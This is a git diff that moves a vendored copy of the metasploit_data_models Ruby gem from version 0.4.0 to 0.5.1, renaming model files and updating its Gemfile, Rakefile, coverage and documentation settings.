rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/app/mailers/.gitkeep (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/app/models/.gitkeep (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/app/views/layouts/application.html.erb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config.ru (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/application.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/boot.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/database.yml.example (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/environment.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/environments/development.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/environments/production.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/environments/test.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/initializers/backtrace_silencers.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/initializers/inflections.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/initializers/mime_types.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/initializers/secret_token.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/initializers/session_store.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/initializers/wrap_parameters.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/routes.rb (100%) create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/db/schema.rb rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/lib/assets/.gitkeep (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/log/.gitkeep (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/public/404.html (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/public/422.html (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/public/500.html (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/public/favicon.ico (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/script/rails (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/lib/base64_serializer_spec.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/spec_helper.rb (96%) rename lib/gemcache/ruby/1.9.1/specifications/{metasploit_data_models-0.3.0.gemspec => metasploit_data_models-0.5.1.gemspec} (72%) diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Gemfile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Gemfile deleted file mode 100755 index b72e01d066..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Gemfile +++ /dev/null @@ -1,10 +0,0 @@ -source "http://rubygems.org" - -# Specify your gem's dependencies in metasploit_data_models.gemspec -gemspec - -group :test do - # rails is only used for testing with a dummy application in spec/dummy - gem 'rails' - gem 'rspec-rails' -end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Rakefile deleted file mode 100755 index ccea92f08e..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Rakefile +++ /dev/null @@ -1,7 +0,0 @@ -require 'bundler/gem_tasks' -require 'rspec/core/rake_task' - -RSpec::Core::RakeTask.new(:spec) - -task :default => :spec - diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_vuln.rb deleted file mode 100755 index 3d938d3ef9..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_vuln.rb +++ /dev/null @@ -1,16 +0,0 @@ -class Mdm::WebVuln < ActiveRecord::Base - # - # Relations - # - - belongs_to :web_site, :class_name => 'Mdm::WebSite' - - # - # Serializations - # - - serialize :params, MetasploitDataModels::Base64Serializer.new - - ActiveSupport.run_load_hooks(:mdm_web_vuln, self) -end - diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/version.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/version.rb deleted file mode 100755 index cf7d89cc68..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/version.rb +++ /dev/null @@ -1,7 +0,0 @@ -module MetasploitDataModels - # MetasploitDataModels follows the {Semantic Versioning Specification http://semver.org/}. At this time, the API - # is considered unstable because the database migrations are still in metasploit-framework and certain models may not - # be shared between metasploit-framework and pro, so models may be removed in the future. Because of the unstable API - # the version should remain below 1.0.0 - VERSION = '0.4.0' -end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.gitignore b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.gitignore similarity index 78% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.gitignore rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.gitignore index e5b2a024e4..9cf3f2824c 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.gitignore +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.gitignore @@ -6,13 +6,19 @@ *.gem # Rubymine project configuration .idea +# logs +*.log # Don't check in rvmrc since this is a gem .rvmrc +# YARD database +.yardoc +# coverage report directory for simplecov/Rubymine +coverage +# generated yardocs +doc # Installed gem versions. Not stored for the same reasons as .rvmrc Gemfile.lock # Packaging directory for builds pkg/* # Database configuration (with passwords) for specs spec/dummy/config/database.yml -# logs -*.log diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.rspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.rspec similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.rspec rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.rspec diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.simplecov b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.simplecov new file mode 100644 index 0000000000..c46d9aaf94 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.simplecov @@ -0,0 +1,38 @@ +# RM_INFO is set when using Rubymine. In Rubymine, starting SimpleCov is +# controlled by running with coverage, so don't explicitly start coverage (and +# therefore generate a report) when in Rubymine. This _will_ generate a report +# whenever `rake spec` is run. +unless ENV['RM_INFO'] + SimpleCov.start +end + +SimpleCov.configure do + load_adapter('rails') + + # ignore this file + add_filter '.simplecov' + + # + # Changed Files in Git Group + # @see http://fredwu.me/post/35625566267/simplecov-test-coverage-for-changed-files-only + # + + untracked = `git ls-files --exclude-standard --others` + unstaged = `git diff --name-only` + staged = `git diff --name-only --cached` + all = untracked + unstaged + staged + changed_filenames = all.split("\n") + + add_group 'Changed' do |source_file| + changed_filenames.detect { |changed_filename| + source_file.filename.end_with?(changed_filename) + } + end + + # + # Specs are reported on to ensure that all examples are being run and all + # lets, befores, afters, etc are being used. + # + + add_group 'Specs', 'spec' +end \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.yardopts b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.yardopts new file mode 100644 index 0000000000..5d51dac244 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.yardopts @@ -0,0 +1,4 @@ +--markup markdown +--protected +{app,lib}/**/*.rb +db/migrate/*.rb \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Gemfile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Gemfile new file mode 100755 index 0000000000..c4e6b487cb --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Gemfile @@ -0,0 +1,22 @@ +source "http://rubygems.org" + +# Specify your gem's dependencies in metasploit_data_models.gemspec +gemspec + +# used by dummy application +group :development, :test do + # supplies factories for producing model instance for specs + gem 'factory_girl_rails' + # rails is only used for the dummy application in spec/dummy + gem 'rails' +end + +group :test do + # In a full rails project, factory_girl_rails would be in both the :development, and :test group, but since we only + # want rails in :test, factory_girl_rails must also only be in :test. + # add matchers from shoulda, such as validates_presence_of, which are useful for testing validations + gem 'shoulda-matchers' + # code coverage of tests + gem 'simplecov', :require => false + gem 'rspec-rails' +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/LICENSE b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/LICENSE similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/LICENSE rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/LICENSE diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/README.md b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/README.md similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/README.md rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/README.md diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Rakefile new file mode 100755 index 0000000000..b582299d61 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Rakefile @@ -0,0 +1,20 @@ +#!/usr/bin/env rake +begin + require 'bundler/setup' +rescue LoadError + puts 'You must `gem install bundler` and `bundle install` to run rake tasks' +end + + +APP_RAKEFILE = File.expand_path('../spec/dummy/Rakefile', __FILE__) +load 'rails/tasks/engine.rake' + +Bundler::GemHelper.install_tasks + +require 'rspec/core/rake_task' + +RSpec::Core::RakeTask.new(:spec) +task :default => :spec + +load 'lib/tasks/yard.rake' + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/api_key.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/api_key.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/api_key.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/api_key.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/client.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/client.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/client.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/client.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/cred.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/cred.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/cred.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/event.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/event.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/event.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/exploit_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/exploit_attempt.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/exploit_attempt.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/exploit_attempt.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/exploited_host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/exploited_host.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/exploited_host.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/exploited_host.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host_detail.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host_detail.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host_detail.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host_tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host_tag.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host_tag.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host_tag.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/imported_cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/imported_cred.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/imported_cred.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/imported_cred.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/listener.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/listener.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/listener.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/listener.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/loot.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/loot.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/loot.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/loot.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/macro.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/macro.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/macro.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/macro.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/mod_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/mod_ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/mod_ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/mod_ref.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_action.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_action.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_action.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_action.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_arch.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_arch.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_arch.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_arch.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_author.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_author.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_author.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_author.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_detail.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_detail.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_detail.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_mixin.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_mixin.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_mixin.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_mixin.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_platform.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_platform.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_platform.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_platform.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_ref.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_target.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_target.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_target.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/nexpose_console.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/nexpose_console.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/nexpose_console.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/nexpose_console.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/note.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/note.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/note.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/note.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/profile.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/profile.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/profile.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/profile.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/ref.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/report.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/report.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/report.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/report.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/report_template.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/report_template.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/report_template.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/report_template.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/route.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/route.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/route.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/route.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/service.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/service.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/service.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/service.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/session.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/session.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/session.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/session.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/session_event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/session_event.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/session_event.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/session_event.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/tag.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/tag.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/tag.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/task.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/task.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/task.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/task.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/user.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/user.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/user.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/user.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_attempt.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_attempt.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_attempt.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_detail.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_detail.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_detail.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_ref.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_form.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_form.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_form.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_form.rb diff --git 